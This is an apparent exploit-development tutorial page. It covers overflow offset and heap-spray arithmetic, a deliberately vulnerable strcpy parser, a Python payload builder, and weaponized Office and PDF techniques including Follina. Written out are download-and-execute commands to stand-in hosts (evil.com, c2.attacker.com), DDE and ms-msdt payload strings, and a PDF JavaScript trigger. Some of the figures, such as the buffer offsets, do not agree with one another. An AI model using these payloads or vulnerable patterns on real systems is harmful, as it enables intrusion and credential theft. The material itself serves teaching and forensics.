Deep Dive: The World of Exploits — Zero-Click & Document Exploits

// 02 — The Hacker's Math ⏱ 8 min · Intermediate

Calculations Behind Every Exploit

Every exploit is a math problem. Before any code is written, the attacker must calculate: how many bytes to write, what address to overwrite, how to convert a URL into hex, how to align shellcode in memory, and how to translate between decimal, hexadecimal, and binary. This section breaks down every calculation step-by-step so you see exactly how the numbers work.

Hexadecimal — The Hacker's Number System

Computers work in binary (base-2), humans work in decimal (base-10), but hackers work in hexadecimal (base-16). Why? Because one hex digit maps perfectly to 4 binary bits, and two hex digits map to exactly one byte (8 bits). This makes it trivial to read and write raw memory contents.

Base Conversion Reference Decimal 0-15 = Hex 0-F = Binary 0000-1111 1 hex digit = 4 bits (a "nibble") 2 hex digits = 8 bits = 1 byte 4 hex digits = 16 bits = 1 word (on x86) 8 hex digits = 32 bits = 1 DWORD = 1 memory address (x86)

Example: Converting the EIP Target Address Target address: 0x0C0C0C0C Hex: 0C 0C 0C 0C Dec: 12 12 12 12 (each byte) Full decimal: 0x0C0C0C0C = 12\times16⁷ + 0\times16⁶ + 12\times16⁵ + 0\times16⁴ + 12\times16³ + 0\times16² + 12\times16¹ + 0\times16⁰ = 12\times268435456 + 12\times1048576 + 12\times4096 + 12\times16 = 3,221,225,472 + 12,582,912 + 49,152 + 192 = 201,326,592 decimal \approx 192 MB into the address space This is why heap spray works — 192MB is reachable after spraying 200MB of NOP sled copies

Little-Endian Byte Order (x86 CPUs) x86 stores multi-byte values in little-endian order (least significant byte first) Address 0xDEADBEEF stored in memory as: EF BE AD DE Address 0x0C0C0C0C stored in memory as: 0C 0C 0C 0C (palindrome — same either way!) Python: struct.pack("<I", 0xDEADBEEF) → b"\xef\xbe\xad\xde" Attackers specifically choose 0x0C0C0C0C because it reads the same forwards and backwards — no endian confusion

The Buffer Overflow — Calculated Byte by Byte

A buffer overflow isn't random — it's precisely calculated. The attacker must determine the exact number of bytes between the start of the buffer and the saved EIP (return address) on the stack. This offset determines how much "junk" padding to write before placing the hijacked address.

The Vulnerable C Code — Where the Bug Lives

vulnerable_parser.c — the root cause of the exploit

// This is the ACTUAL vulnerable function inside a PDF reader / document parser.
// The programmer allocated a fixed-size buffer but used an UNSAFE copy function.

void parse_document_title(char *incoming_doc_data) {
    char title_buffer[50];  // The application allocates exactly 50 bytes for the title
    
    // VULNERABILITY: strcpy() does NOT check the length of incoming data!
    // If the attacker puts 200 bytes in the document's title field,
    // it violently overflows title_buffer, spilling into adjacent memory
    // and overwriting the saved EBP and saved EIP on the stack.
    strcpy(title_buffer, incoming_doc_data);  // ← THE BUG
}

// WHY THIS IS DANGEROUS:
// title_buffer sits on the stack. Right after it (at higher addresses) are:
//   - Saved EBP (4 bytes) — the previous function's base pointer
//   - Saved EIP (4 bytes) — the RETURN ADDRESS (where the CPU goes next)
// If the attacker writes 50 + 4 + 4 = 58 bytes, they control EIP!

// SAFE ALTERNATIVE: strncpy(title_buffer, incoming_doc_data, sizeof(title_buffer) - 1);
// This limits the copy to 49 bytes maximum — no overflow possible.

Offset Calculation — How Many Bytes to EIP? Stack layout (low address \to high address): [title_buffer: 50 bytes] [alignment padding: 2 bytes] [saved EBP: 4 bytes] [saved EIP: 4 bytes] Offset to EIP = buffer_size + padding + saved_EBP Offset = 50 + 2 + 4 = 56 bytes The compiler may add 2 bytes padding to align the stack to a 4-byte boundary (50 is not divisible by 4, 52 is) So the attacker writes: 56 bytes of junk ("A"\times56) + 4 bytes EIP + shellcode Total minimum payload: 56 + 4 + 342 = 402 bytes

The Exploit Tool — Python Precision

overflow_tool.py — the exploit builder

# ═══════════════════════════════════════════════════
# THE TOOL PROVISIONING LOGIC
# This is how an attacker builds the overflow payload.
# Every byte is calculated and placed precisely.
# ═══════════════════════════════════════════════════

from struct import pack

# ── Configuration (from fuzzing/debugging) ──
buffer_limit = 64              # The 'safe' buffer size (found by reversing the binary)
target_eip   = b"\xef\xbe\xad\xde"  # The hijacked address: 0xDEADBEEF (little-endian!)

# THE MATH:
# buffer_limit = 64 bytes (the vulnerable buffer's allocated size)
# We need EXACTLY 64 bytes of junk to fill the buffer completely.
# The next 4 bytes on the stack ARE the saved EIP (return address).
# By writing 64 + 4 = 68 bytes, we overwrite EIP with our target.

# 1. Fill the buffer with 'A's (0x41 in hex)
padding = b"A" * buffer_limit
# Result: b"AAAAAAAAAA...AAAA" (64 bytes)
# In hex: 41 41 41 41 41 41 41 41 ... (64 times)

# 2. Append the target return address
# Because we filled EXACTLY 64 bytes, these next 4 bytes
# spill over the buffer boundary and overwrite saved EIP
overflow = padding + target_eip
# Result: b"AAAA...AAAA\xef\xbe\xad\xde" (68 bytes)
# Memory: [41 41 41 41 ...×64... 41 41 41 41] [EF BE AD DE]
#          ← buffer (filled) →                ← EIP (hijacked!) →

# 3. Add the shellcode (the actual malicious instructions)
shellcode = b"\x90\x90\x90\x90"  # NOP sled (0x90 = "do nothing")
shellcode += b"\x31\xc0"         # xor eax, eax (clear register)
shellcode += b"\x50"             # push eax (push NULL onto stack)
shellcode += b"\x68\x2f\x2f\x73\x68"  # push "//sh" (the command to run)
# ... more instructions to download & execute payload ...

# 4. ASSEMBLE THE FINAL ATTACK STRING
final_attack_string = overflow + shellcode

print(f"Buffer size:  {buffer_limit} bytes (junk padding)")
print(f"EIP target:   {target_eip.hex()} → 0xDEADBEEF")
print(f"Shellcode:    {len(shellcode)} bytes")
print(f"Total attack: {len(final_attack_string)} bytes")
print()
print(f"Layout in memory:")
print(f"[{'A'*8}...×{buffer_limit}...{'A'*8}] [EFBEADDE] [9090...shellcode]")
print(f" ←── {buffer_limit} bytes (junk) ──→  ← 4B EIP → ← {len(shellcode)}B code →")

Visual: What This Generates in Memory [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] \leftarrow bytes 0-15 (AAAA... junk) [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] \leftarrow bytes 16-31 [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] \leftarrow bytes 32-47 [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] \leftarrow bytes 48-63 (end of buffer) [EF BE AD DE] \leftarrow bytes 64-67 = EIP OVERWRITE (0xDEADBEEF) [90 90 90 90 31 C0 50 68 2F 2F 73 68 ...] \leftarrow bytes 68+ = SHELLCODE

Converting a URL to Shellcode Hex

The shellcode needs to contain the URL of the second-stage payload — but it can't use plain text strings (security tools would detect them). Instead, the attacker converts every character of the URL into its hex byte value using the ASCII table. This makes the URL invisible to string-based scanners.

ASCII \to Hex Conversion Table (URL Characters)'h' = 0x68 | 't' = 0x74 | 'p' = 0x70 | 's' = 0x73':' = 0x3A | '/' = 0x2F | '.' = 0x2E | 'e' = 0x65'x' = 0x78 | 'u' = 0x75 | 'y' = 0x79 | 'i' = 0x69 Every printable ASCII character has a fixed hex value: A=0x41, Z=0x5A, a=0x61, z=0x7A, 0=0x30, 9=0x39

url_to_shellcode.py — converting strings to exploit format

# ═══════════════════════════════════════════════════
# A hacker uses Python to turn a URL into Hex for the Shellcode
# This is how the URL becomes invisible to antivirus scanners.
# ═══════════════════════════════════════════════════

url = "https://putty.exe"

# Convert each character to its \x## hex representation
hex_url = "".join(["\\x%02x" % ord(c) for c in url])
print(f"Original URL:  {url}")
print(f"Hex Encoded:   {hex_url}")
print()

# Step-by-step: what ord() and %02x do for each character:
#   'h' → ord('h') = 104 → hex(104) = 0x68 → "\x68"
#   't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
#   't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
#   'p' → ord('p') = 112 → hex(112) = 0x70 → "\x70"
#   's' → ord('s') = 115 → hex(115) = 0x73 → "\x73"
#   ':' → ord(':') =  58 → hex(58)  = 0x3a → "\x3a"
#   '/' → ord('/') =  47 → hex(47)  = 0x2f → "\x2f"
#   '/' → ord('/') =  47 → hex(47)  = 0x2f → "\x2f"
#   ... and so on for every character

# RESULT for "https://putty.exe":
# \x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x74\x74\x79\x2e\x65\x78\x65

# Now build the shellcode: machine code + the hex URL string
shellcode  = b"\x31\xc0"      # xor eax, eax    (clear EAX register)
shellcode += b"\x50"          # push eax        (push NULL terminator)
shellcode += b"\x68"          # push DWORD      (push 4 bytes of URL onto stack)
shellcode += url[-4:].encode()  # ".exe" as raw bytes
shellcode += b"\x89\xe3"      # mov ebx, esp    (EBX now points to URL string)
shellcode += b"\x50"          # push eax        (more stack setup...)
shellcode += b"\x53"          # push ebx        (push URL pointer as arg)

print(f"Shellcode bytes: {shellcode.hex()}")
print(f"Shellcode size:  {len(shellcode)} bytes")
print()
print("What antivirus sees: 31c050682e65786589e35053")
print("What it ACTUALLY is: xor eax;push;push '.exe';mov ebx,esp;push;push")

Unicode Encoding Math (for JavaScript Heap Spray) JavaScript uses %uXXYY format where bytes are swapped (little-endian) Raw bytes: FC E8 \to swap \to E8 FC \to JavaScript: %ue8fc Raw bytes: 82 00 \to swap \to 00 82 \to JavaScript: %u0082 Raw bytes: 00 00 \to swap \to 00 00 \to JavaScript: %u0000 Full: FC E8 82 00 00 00 \to "%ue8fc%u0082%u0000" The swap happens because JavaScript's unescape() writes bytes in little-endian order for %u escapes

Heap Spray — The Memory Math

Heap spraying is pure arithmetic. The attacker must calculate exactly how large each spray block is, how many copies are needed, and verify that the target address (0x0C0C0C0C) falls inside the sprayed region.

Spray Block Size Calculation Target block size: 0x100000 hex = 1,048,576 bytes = 1 MB Shellcode size: 342 bytes NOP sled size: 1,048,576 - 342 = 1,048,234 bytes of NOP sled NOP sled % of block: 1,048,234 / 1,048,576 = 99.97% is landing zone Any jump into this 1MB block has a 99.97% chance of hitting the NOP sled \to sliding to shellcode

Total Spray Coverage Number of spray blocks: 200 copies (JavaScript array indices 0-199) Total sprayed memory: 200 \times 1,048,576 = 209,715,200 bytes \approx 200 MB Heap start address (typical): ~0x04000000 (64 MB) Heap end after spray: ~0x04000000 + 0x0C800000 = ~0x10800000 (264 MB) Target address 0x0C0C0C0C = 192 MB... which is INSIDE the sprayed region ✓ The spray covers addresses from ~64MB to ~264MB. Address 192MB (0x0C0C0C0C) falls right in the middle.

NOP Sled Expansion Math (the while loop) Initial: junk_code = "%u9090%u9090" \to 2 characters (2 bytes when decoded) Iteration 1: junk_code += junk_code \to 4 bytes Iteration 2: 4 + 4 = 8 bytes Iteration 3: 8 + 8 = 16 bytes Iteration 4: 16 + 16 = 32 bytes (doubles each time — exponential growth!) Iteration 15: 32,768 bytes Iteration 16: 65,536 bytes Iteration 17: 131,072 bytes Iteration 18: 262,144 bytes = 0x40000 \to LOOP STOPS (\geq 0x40000 = 262,144) Just 18 iterations to go from 2 bytes to 256KB — that's the power of exponential doubling

PDF Structure — Object Numbers & Cross-Reference Math

A PDF file is a structured database of numbered objects. Each object has a generation number (usually 0) and an offset (the byte position from the start of the file where that object begins). The cross-reference table (xref) maps object numbers to byte offsets so the PDF reader can jump directly to any object.

xref Offset Calculation %PDF-1.4\n = 10 bytes (header) Object 1 starts at: byte 9 (after header) Object 1 content: "1 0 obj\n<< /Type /Catalog ... >>\nendobj\n\n" = ~90 bytes Object 2 starts at: 9 + 90 = byte 99 Object 2 content: "2 0 obj\n<< /Type /Pages ... >>\nendobj\n\n" = ~53 bytes Object 3 starts at: 99 + 53 = byte 152 Object 4 starts at: 152 + 68 = byte 220 Each xref entry is exactly 20 bytes (10-digit offset + space + 5-digit gen + space + f/n + \r\n)

🧮 Why This Math Matters

Every number in an exploit is calculated, not guessed. The buffer size comes from reverse-engineering the target binary. The EIP offset comes from cyclic pattern fuzzing. The heap spray address comes from memory layout analysis. The xref offsets come from counting bytes in the PDF file. If any single number is wrong by even 1 byte, the exploit crashes the target instead of compromising it. This is why exploit development is considered one of the most difficult skills in cybersecurity — it's applied mathematics at the machine code level.

🔢 Exploit Math Calculator — Try It Live

Computers store everything as numbers — but hackers, CPUs, and network protocols each prefer different formats. Enter a value in any field and the others update automatically.

Decimal (base-10)Normal human numbers — digits 0-9. Example: 255 means two hundred fifty-five.

Hexadecimal (base-16)Uses 0-9 plus A-F. Each hex digit = 4 bits. 0xFF = 255. Memory addresses and exploit payloads are written in hex.

Binary (base-2)Only 0 and 1 — exactly how CPUs think. Each digit is one bit. 8 bits = 1 byte. 11111111 = 255.

Octal (base-8)Digits 0-7. Used in Linux file permissions (chmod 755) and some legacy systems. 0377 = 255.

Enter a number above or click Generate Sample

In a buffer overflow, the attacker must write exactly the right number of bytes to overwrite the return address (EIP). Too few = nothing happens. Too many = crash. This calculator finds the precise offset.

Buffer Size (bytes)Size of the vulnerable buffer — how much data the program allocated. Overflow starts after this many bytes.

Saved EBP Size (bytes)The frame pointer stored on the stack. Usually 4 bytes (32-bit) or 8 bytes (64-bit). Must overwrite this to reach EIP.

Extra Padding (bytes)Some compilers add alignment padding between buffer and EBP. Check with a debugger — usually 0, 4, or 8 bytes.

Target EIP (hex)The address you want the CPU to jump to — typically a heap spray landing zone like 0x0C0C0C0C or a JMP ESP gadget.

CPUs store multi-byte values in different orders. x86 uses little-endian (least significant byte first), while networks use big-endian. When building exploits, you must write addresses in the correct byte order or the CPU reads them wrong.

Address / Hex ValueEnter a memory address or any hex value. Example: DEADBEEF is a common test value, 0C0C0C0C is a heap spray target.

Byte WidthHow many bytes the value occupies. 4 = 32-bit address (x86), 8 = 64-bit address (x64). Pads with zeros if needed.

Enter a hex value to see byte-swapped output

Heap spraying floods the process memory with repeated copies of your payload. When the exploited code jumps to a "random" address, the huge NOP sled catches the CPU and slides it into shellcode. More spray = higher chance of landing.

Spray Block Size (hex)Size of each memory chunk in hex. 100000 = 1 MB. Larger blocks = bigger landing zone per allocation.

Number of BlocksHow many copies to spray. 200 blocks × 1 MB = 200 MB of heap controlled. More blocks = more coverage.

NOP Sled per Block (bytes)NOP (0x90) = "do nothing" instruction. The sled is a huge runway — land anywhere on it and the CPU slides right into shellcode.

Shellcode Size (bytes)The actual malicious code that runs — reverse shell, downloader, etc. Typically 200-800 bytes. Placed after the NOP sled.

// 05 — Weaponized Documents ⏱ 6 min · Intermediate

Weaponized Documents

Document exploits turn familiar file formats — Word (.docx), Excel (.xlsx), PDF (.pdf), RTF (.rtf), and PowerPoint (.pptx) — into weapons. Because users trust documents (they receive invoices, resumes, contracts, and reports daily), weaponized documents remain one of the most effective initial access vectors in real-world attacks. The attacker crafts a file that looks completely normal when opened — it displays the expected content (an invoice, a report, a chart). But hidden inside the file's internal structure are malicious payloads that execute code the moment the application parses them.

Document formats are inherently complex. The PDF specification alone is over 1,000 pages. Microsoft's Office Open XML format contains dozens of XML namespaces with hundreds of features. This complexity means there are thousands of code paths in the parser — and each code path is a potential vulnerability. Below are the eight primary techniques attackers use to weaponize documents.

The Major Attack Surfaces

📊

VBA Macros

What it is: Visual Basic for Applications (VBA) is a full programming language embedded inside Microsoft Office. Macros are VBA programs stored inside .docm, .xlsm, or .pptm files. When a user clicks "Enable Content," the macro runs with the same privileges as the Office application.

How attackers use it: The attacker writes a VBA macro that uses the Shell() function or WScript.Shell to execute system commands — typically downloading a second-stage payload from a remote server using PowerShell (powershell -e [base64 encoded command]). The macro auto-executes on open via Auto_Open() or Document_Open() event handlers.

Example generation: A macro containing Sub Auto_Open() / Shell "powershell -e JABjAD0..." / End Sub executes the moment the user clicks "Enable Content." The base64 string decodes to a PowerShell cradle that downloads a Cobalt Strike beacon from the attacker's server.

🔗

OLE Objects

What it is: Object Linking and Embedding (OLE) allows embedding foreign objects inside a document — Excel sheets inside Word, PDF files inside PowerPoint, or even executable programs disguised with document icons. The embedded object is stored as a binary blob inside the document file.

How attackers use it: The attacker embeds a malicious OLE object — often targeting the archaic Microsoft Equation Editor (EQNEDT32.EXE), which has a known buffer overflow (CVE-2017-11882). When the document renders the embedded equation, EQNEDT32.EXE parses the OLE data, hits the overflow, and the attacker's shellcode executes. No "Enable Content" prompt appears because this is not a macro attack — it exploits the rendering engine itself.

Example generation: The OLE object contains a crafted equation binary where the font name field exceeds 48 bytes, overflowing EQNEDT32.EXE's stack buffer and overwriting the return address with a pointer to the embedded shellcode.

🌐

Remote Templates

What it is: Word and Excel documents can reference external template files via a URL. The template URL is stored in the document's relationship file (word/_rels/document.xml.rels inside the .docx ZIP archive). When the document opens, Office fetches the remote template automatically.

How attackers use it: The initial document contains zero malicious content — it passes every antivirus scan. But when opened, it fetches a remote .dotm template from the attacker's server. That template contains the actual malicious macro or exploit. This two-stage approach evades email security scanners because the malicious payload never touches the email gateway.

Example generation: The attacker modifies document.xml.rels to include Target="http://evil.com/template.dotm" with TargetMode="External". The .docx file itself is completely clean. The payload only exists on the remote server.

⚡

DDE / Field Codes

What it is: Dynamic Data Exchange (DDE) is a legacy Windows inter-process communication protocol. Word and Excel support DDE field codes that can pull data from other applications. The field code { DDEAUTO "cmd" "/c calc.exe" } tells Word to execute the command via DDE.

How attackers use it: The attacker inserts a DDE field code into a .docx file. When the user opens the document, Word prompts "This document contains links to other data sources. Do you want to update?" If the user clicks "Yes" (which most users do reflexively), the DDE command executes — typically launching PowerShell to download malware. This works even with macros completely disabled.

Example generation: Insert field code: { DDEAUTO c:\\windows\\system32\\cmd "/k powershell -e [payload]" }. The field appears as "!Unexpected End of Formula" in the document text, which the attacker hides by formatting the font as white, 1pt size.

📐

Equation Editor (CVE-2017-11882)

What it is: EQNEDT32.EXE is Microsoft's Equation Editor — a 17-year-old component compiled without any stack protections (no ASLR, no DEP, no stack canaries). It processes OLE objects embedded in Office documents when they contain mathematical equations.

How attackers use it: A specially crafted OLE equation object contains a font name that exceeds the 48-byte buffer in EQNEDT32.EXE. The overflow overwrites the saved return address on the stack. When the function returns, it jumps to the attacker's shellcode instead of the legitimate caller. Because EQNEDT32.EXE has no ASLR, the attacker knows exactly where the buffer is in memory.

Example generation: The OLE object's font record: [48 bytes of font name] [4 bytes: return address → shellcode] [shellcode bytes]. The return address is hardcoded to 0x00402114 (a known "call eax" gadget in EQNEDT32.EXE). Still actively exploited today.

🖨️

Follina (CVE-2022-30190)

What it is: A vulnerability in Microsoft's Support Diagnostic Tool (MSDT). Documents can invoke MSDT via the ms-msdt: protocol URI handler. The diagnostic tool accepts command-line arguments that include PowerShell code, which it executes with the user's privileges.

How attackers use it: The attacker creates a .docx file with an external OLE reference pointing to an attacker-controlled HTML page. When Word fetches this page, the HTML contains JavaScript that redirects to a ms-msdt: URI with embedded PowerShell commands. MSDT launches and executes the commands. No macros, no "Enable Content" prompt — not even Protected View stops it in some configurations.

Example generation: The ms-msdt URI: ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? /../../$(powershell -e [base64])/..". The PowerShell payload encoded in base64 downloads and executes a reverse shell.

💿

MotW Bypass (ISO/IMG Containers)

What it is: Mark-of-the-Web (MotW) is a Windows security feature that tags files downloaded from the internet with a Zone.Identifier NTFS alternate data stream. Office blocks macros from MotW-tagged files. But ISO/IMG disk image files and ZIP archives can strip MotW from files inside them.

How attackers use it: The attacker packages a malicious .docm or .lnk file inside an ISO disk image. When the victim opens the ISO, Windows mounts it as a virtual drive. Files extracted from the mounted drive do not inherit the MotW tag, so macro-blocking and SmartScreen warnings are bypassed. This became the dominant delivery technique in 2022-2023 after Microsoft blocked internet-sourced macros by default.

Example generation: Attacker creates Invoice.iso containing Invoice.docm + a shortcut (.lnk) that auto-runs PowerShell. The ISO bypasses MotW → the .lnk runs without SmartScreen interception.

📓

OneNote Attacks (.one Files)

What it is: Microsoft OneNote allows embedding arbitrary file attachments inside .one notebook files. Unlike Word/Excel, OneNote did not block macros or restrict executable content — it simply showed a generic "double-click to open attachment" prompt.

How attackers use it: After Microsoft blocked VBA macros from internet documents (2022), threat actors switched to OneNote as their primary delivery format. The attacker embeds a .bat, .vbs, .hta, or .wsf script inside a .one file, layered behind a graphic that says "Double-click to view document." When clicked, the embedded script executes. Qakbot, AsyncRAT, and IcedID campaigns all adopted this technique in Q1 2023.

Example generation: The .one file contains an embedded payload.bat that runs powershell -e [base64], hidden behind a "Click here to view" image overlay that covers the entire page.

Document Exploit: Anatomy — The Full Attack Flow

Every document exploit follows a similar pattern: delivery → trigger → execution → post-exploitation. Here is a detailed breakdown showing exactly what happens at each stage, including what code or data is involved and what the system sees:

anatomy-of-doc-exploit.pseudo — complete attack flow

// Complete anatomy of a document exploit chain
// This shows EXACTLY what happens at each stage

STAGE 1: DELIVERY
  → Attacker crafts a phishing email:
     From: accounting@acme-corp.net (spoofed domain)
     Subject: "Invoice #2024-0342 — Payment Overdue"
     Attachment: Invoice_March_2024.pdf (6.8 KB)
  → The PDF looks like a legitimate invoice when opened
  → The recipient is in Accounts Payable — they open invoices daily
  → The file passes the email gateway's antivirus scan
     (because the payload is compressed/obfuscated inside a stream)

STAGE 2: TRIGGER — What Happens When the File Opens
  → The user double-clicks the PDF attachment
  → Adobe Reader (or the system PDF viewer) launches
  → The reader parses the PDF's object structure:
     Object 1: Catalog → finds /OpenAction → follows reference
     Object 7: Action → type is /JavaScript → loads JS engine
     Object 9: Stream → FlateDecode decompresses 4,821 bytes
  → The decompressed JavaScript begins executing immediately
  → The user sees the invoice on screen — nothing looks wrong

STAGE 3: EXPLOITATION — The JavaScript Payload Executes
  → The JavaScript performs three operations:
     1. DECODE: Converts hex-encoded shellcode to binary
        var sc = unescape("%ue8fc%u8200%u0000%u6089...");
     2. HEAP SPRAY: Fills 200MB of memory with shellcode copies
        for(i=0; i<200; i++) spray[i] = nopsled + shellcode;
     3. TRIGGER: Calls a vulnerable Reader API function
        Collab.collectEmailInfo({subj: "A".repeat(0x4141)});
  → The API function has a buffer overflow vulnerability
  → The oversized string overflows the buffer, overwrites EIP
  → EIP now points to 0x0C0C0C0C (inside the sprayed heap)
  → CPU jumps to the NOP sled → slides into shellcode
  → The attacker now has code execution in the Reader process

STAGE 4: POST-EXPLOITATION — Full Compromise
  → Shellcode downloads second-stage payload:
     URLDownloadToFileA("http://c2.attacker.com/beacon.exe")
  → Beacon.exe is a Cobalt Strike implant that:
     • Establishes encrypted C2 channel to attacker's server
     • Uses kernel exploit for SYSTEM privilege escalation
     • Dumps credentials with Mimikatz
     • Moves laterally across the network via SMB/WMI
     • Discovers domain controller, becomes Domain Admin
  → Data exfiltration begins — or ransomware deploys
  → The entire chain: email → PDF → JavaScript → shellcode → beacon
     took less than 3 seconds from the moment the file was opened

Follina Deep Dive (CVE-2022-30190) — Complete Technical Breakdown

Follina was a game-changer because it achieved remote code execution without macros, without "Enable Content" prompts, and even from the Windows Explorer preview pane. Here is exactly how the exploit works, step by step, with every component explained:

follina-mechanism.txt — complete technical breakdown

// Follina Attack Flow (CVE-2022-30190) — Full Technical Detail

1. THE DOCUMENT STRUCTURE
   Attacker creates a .docx file (which is a ZIP archive containing XML).
   Inside the ZIP, they modify: word/_rels/document.xml.rels
   They add an external OLE object reference:

   <Relationship Id="rId1337"
     Type="http://schemas.openxmlformats.org/officeDocument/
           2006/relationships/oleObject"
     Target="https://attacker-server.com/payload.html"
     TargetMode="External" />

   The .docx itself contains NO malicious code — it just has a URL.

2. WORD FETCHES THE REMOTE PAYLOAD
   → User opens the .docx (or just hovers over it in Explorer)
   → Word parses document.xml.rels, finds the external relationship
   → Word makes an HTTP GET request to the attacker's server
   → The server responds with an HTML file:

3. THE HTML PAYLOAD (served by attacker)
   <!DOCTYPE html>
   <html><body>
   <script>
     window.location.href = "ms-msdt:/id PCWDiagnostic
       /skip force /param \"IT_RebrowseForFile=cal?c
       IT_LaunchMethod=ContextMenu
       IT_SelectProgram=NotListed
       IT_BrowseForFile=h]$(IEX('powershell -e JABjAGw...'))
       i]/../../../../../../../../../../../temp/doc.html\";";
   </script>
   </body></html>

4. MSDT EXECUTES THE PAYLOAD
   → The ms-msdt: URI launches Microsoft Support Diagnostic Tool
   → MSDT parses the /param arguments
   → The IT_BrowseForFile parameter contains a PowerShell command
     wrapped in $() — which MSDT executes as part of path expansion
   → PowerShell runs with the user's full privileges
   → The base64-encoded command (JABjAGw...) decodes to:
     $c=New-Object Net.WebClient;
     $c.DownloadFile('http://c2.evil.com/shell.exe','C:\Temp\s.exe');
     Start-Process 'C:\Temp\s.exe'

5. RESULT: FULL REMOTE CODE EXECUTION
   → No macro prompt — this isn't a macro attack
   → No "Enable Content" — there's no VBA code
   → Protected View was bypassed in RTF files (no sandbox at all)
   → Even the Explorer Preview Pane triggered the exploit
   → The user saw a normal document. The system was fully compromised.

// Impact: Affected all Windows versions with Office installed.
// Patched in June 2022. Exploited in the wild by APT groups
// including Chinese state-sponsored actors targeting US/EU.

🔍 Why Follina Was So Impactful — Key Points 1. It bypassed every traditional Office security control — macro blocking, Protected View (in RTF mode), and AMSI (Antimalware Scan Interface) because the payload was executed by MSDT, not by Office.
2. It worked in .docx, .rtf, and .pptx files. RTF files were especially dangerous because they could trigger the exploit from the Windows Explorer preview pane — no double-click needed.
3. The initial .docx file contained zero malicious code — just a URL. This meant email scanners and antivirus software rated the file as clean. The actual payload was on the attacker's server and could be changed at any time.
4. The fix required disabling the ms-msdt: protocol handler entirely via registry: reg delete HKCR\ms-msdt /f

// 06 — PDF Exploit Internals ⏱ 15 min · Advanced

Inside a PDF Exploit

PDF files aren't just static pages — the PDF specification (ISO 32000, over 1,000 pages) supports embedded JavaScript, form actions, URI handlers, launch actions, complex stream objects, and encrypted content. Adobe Reader includes a full JavaScript engine (based on SpiderMonkey) that can execute code embedded inside PDF objects. Attackers weaponize these features to run arbitrary code the instant a PDF is opened.

A PDF file is structured as a collection of numbered objects. Each object has a type and properties defined by key-value pairs. Objects can reference other objects by number. The root of the document is the Catalog (always Object 1), which points to the page tree, which points to individual pages, which point to content streams containing the actual text and graphics. Hidden among these legitimate objects, an attacker adds JavaScript Action objects and compressed payload streams that execute automatically on open.

Below, we show two complete PDF files opened in a text editor — every single line of their internal structure is visible. The first is a clean, legitimate invoice. The second is the same invoice after an attacker has weaponized it by injecting three additional objects and modifying one line of the Catalog. Understanding the difference between these two files is the core of PDF forensics.

🔬 What You'll See Below Two side-by-side "Notepad views" showing the raw internal structure of a PDF file. The clean version has 6 objects: a Catalog (root), a page tree, a page definition, a content stream (the visible invoice text), and two font definitions. The exploited version has all 6 of those same objects plus 3 injected objects: an Action trigger, a backup Action, and a compressed JavaScript payload stream. Every line is annotated with explanations. Red-highlighted lines in the exploited version show exactly what the attacker added or changed.

Clean vs. Exploited — Raw "Notepad" View

If you open any PDF file in Notepad (or a hex editor), you will see its raw internal structure. A PDF is not a binary blob — it's a structured text format containing numbered objects, each with a type and properties. Below are two complete PDFs: a legitimate invoice, and the same invoice after an attacker has weaponized it. Every single line is shown — nothing is skipped.

📄 Invoice_March_2024.pdf (2.1 KB) Clean

───── PDF HEADER ───── %PDF-1.7 ↑ Magic bytes — identifies this as a PDF version 1.7 file. ↑ Every PDF reader checks this first line. %âãÏÓ ↑ Binary comment — tells text editors this file has binary content. ───── OBJECT 1: CATALOG (the root) ───── 1 0 obj ↑ Object number 1, revision 0. This is the document catalog. << /Type /Catalog ↑ Declares this object as the root catalog of the PDF. /Pages 2 0 R ↑ Points to Object 2 which holds the page tree. ↑ "2 0 R" means: reference to object #2, revision 0. >> endobj ───── OBJECT 2: PAGE TREE ───── 2 0 obj << /Type /Pages ↑ Container for all pages in the document. /Kids [3 0 R] ↑ Array of child pages. This PDF has one page (Object 3). /Count 1 ↑ Total number of pages in the document. >> endobj ───── OBJECT 3: THE PAGE ───── 3 0 obj << /Type /Page /Parent 2 0 R ↑ Back-reference to parent page tree (Object 2). /MediaBox [0 0 612 792] ↑ Page dimensions in points. 612×792 = US Letter (8.5" × 11"). /Contents 4 0 R ↑ The actual visible content is in Object 4. /Resources << /Font << /F1 5 0 R ↑ Font F1 is defined in Object 5 (Helvetica). /F2 6 0 R ↑ Font F2 is defined in Object 6 (Helvetica-Bold). >> >> >> endobj ───── OBJECT 4: PAGE CONTENT STREAM ───── 4 0 obj << /Length 412 >> ↑ Stream is 412 bytes of PDF drawing commands. stream — Everything between stream/endstream is the page content — BT ↑ BT = Begin Text block. /F2 22 Tf ↑ Select font F2 (Helvetica-Bold) at 22pt size. 72 740 Td ↑ Move text cursor to position (72, 740) — top-left area. (INVOICE) Tj ↑ Tj = Show text string "INVOICE". /F1 11 Tf ↑ Switch to font F1 (Helvetica) at 11pt. 0 -24 Td (Invoice #2024-0342) Tj 0 -16 Td (Date: March 15, 2024) Tj 0 -16 Td (Bill To: Acme Corporation) Tj 0 -16 Td (Attn: Jane Doe, Accounts Payable) Tj 0 -32 Td /F2 11 Tf (Description Qty Rate Amount) Tj /F1 10 Tf 0 -18 Td (Consulting Services 40 $85.00 $3,400.00) Tj 0 -14 Td (Software License 1 $650.00 $650.00) Tj 0 -14 Td (Support Package 1 $200.00 $200.00) Tj 0 -24 Td /F2 11 Tf (TOTAL DUE: $4,250.00) Tj 0 -32 Td /F1 9 Tf (Payment Terms: Net 30) Tj 0 -14 Td (Please remit to: Acme Corp, PO Box 1234) Tj ET ↑ ET = End Text block. All visible content ends here. endstream endobj ───── OBJECT 5: FONT DEFINITION ───── 5 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj ───── OBJECT 6: BOLD FONT ───── 6 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica-Bold >> endobj ───── CROSS-REFERENCE TABLE ───── xref ↑ Byte-offset index — tells the reader where each object starts. 0 7 ↑ 7 entries (objects 0–6). 0000000000 65535 f 0000000015 00000 n 0000000089 00000 n 0000000164 00000 n 0000000398 00000 n 0000000862 00000 n 0000000939 00000 n ───── TRAILER ───── trailer << /Size 7 ↑ Total number of objects in the xref table. /Root 1 0 R ↑ Points to the Catalog (Object 1) as the document root. >> startxref 1022 